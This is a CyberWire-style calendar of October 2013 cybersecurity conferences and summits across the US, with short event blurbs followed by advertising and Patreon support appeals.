NSU Healthcare Cyber Security Summit (Fort Lauderdale, Florida, USA, October 17, 2013) In today's modern healthcare systems, data is everywhere, including sensitive patient data that needs to be secured and monitored. Join top healthcare security professionals from Nova Southeastern University,...

Nuclear Regulatory Commission Cyber Security Conference & Expo (Rockville, Maryland, USA, October 17, 2013) This one-day conference will consist of cyber sessions in the NRC Auditorium given by government and industry speakers. Exhibit tables will be set-up just outside the Auditorium and companies will have...

Securing the Internet of Things Summit (San Francisco, California, USA, October 21, 2013) The Internet of Things is still in its infancy and the security community has a chance to build in new approaches to security if we get started now. More secure embedded operating systems and applications,...

13th Industrial Control Systems Cyber Security Conference (Atlanta, Georgia, USA, October 21 - 22, 2013) Industrial Control Systems (ICS) operate the infrastructures of electric power, water, chemicals, manufacturing, transportation, defense, etc. and link the digital and physical worlds. Their cyber security...

Cloud Connect (Chicago, Illinois, USA, October 21 - 23, 2013) Cloud Connect returns to Chicago October 21-23, 2013 with an all new program built around the leading cloud platforms. Cloud Connect provides the independent guidance IT professionals need to successfully...

cybergmut Technical Tuesday: Cyber Security Strategy — Why We're Losing and What's Needed to Win (Columbia, Maryland, USA, October 22, 2013) CrowdStrike's Steve Chabinsky of CrowdStrike explains the situation. Everybody seems to be spending more on cybersecurity, but with questionable return on investment. In fact, the problem clearly is getting...

Cyber Security Seminar and IT Expo at Peterson AFB (Colorado Springs, Colorado, USA, October 22, 2013) The Cyber Security Seminar and IT Expo is a one-day event held on-site where industry vendors will have the opportunity to display their products to personnel attending briefings concerning the latest...

Joint Federal Cyber Summit 2013 (Washington, DC, USA, October 23 - 24, 2013) This collaborative government wide event is truly one of a kind, with speakers and attendees anticipated to represent more than 10 federal government agencies. Information sharing will be accomplished...

NSU's 12 Simple Cybersecurity Rules For Your Small Business (Fort Lauderdale, Florida, USA, October 24, 2013) In this presentation twelve simple and inexpensive techniques for protecting small businesses from cyber threats will be discussed. While complex and expensive solutions exist to improve the security...

2013 ACT–IAC Executive Leadership Conference (Williamsburg, Virginia, USA, October 27 - 29, 2013) Advances in technology and massive increases in data available can both challenge and transform Government mission performance. ELC-2013 focuses on how to make this transformation a reality, in and for...

SAP NS2: National Security Solutions Summit (Falls Church, Virginia, USA, October 29, 2013) Join us for a day of learning and networking focused on how to advance U.S. national security and homeland security through I.T. innovation. Top-notch speakers will address the new challenges facing U.S.

Regional Cyber Security Forum & IT Day (CSFI) — Hawaii (Honolulu, Hawai'i, USA, October 30, 2013) 2013 marks the 10th anniversary of National Cyber Security Awareness Month and FBC will host the 1st Annual Cyber Security Forum & IT Day (CSFI) at Fort Shafter - Club Hale Ikena to coinside with the anniversary,...

NSA Hawaii — Cyber Security, Intelligence & IT Day (Honolulu, Hawai'i, USA, October 30, 2013) Be a part of the 1st Annual Cyber Security, Intelligence and IT Day set to take place at the new National Security Agency (NSA) Hawaii Rochefort facility. The event will be hosted by NS/CCS Hawaii Technology...

Grow your brand and reach new customers.

Grow your brand and increase your customer base by educating our audience about your products, services, and events by advertising on The CyberWire. We’ve built trust with an influential (and often hard to reach) audience of CISOs, CSOs, and other senior execs in the security space, across a wide array of industry verticals. Learn more.

Be a part of the CyberWire story.

People ask us (a lot) how they can support what we do. We have our sponsorships and services, of course, but those are not always within every supporter's financial reach, or it might just not be the right time for you to do those things. That's why we launched our new Patreon site, where we've created a wider variety of support levels, each with some new benefits. Our patrons are important to our future, and we hope you'll consider becoming one. We invite you to become part of the CyberWire story. Become a patron today.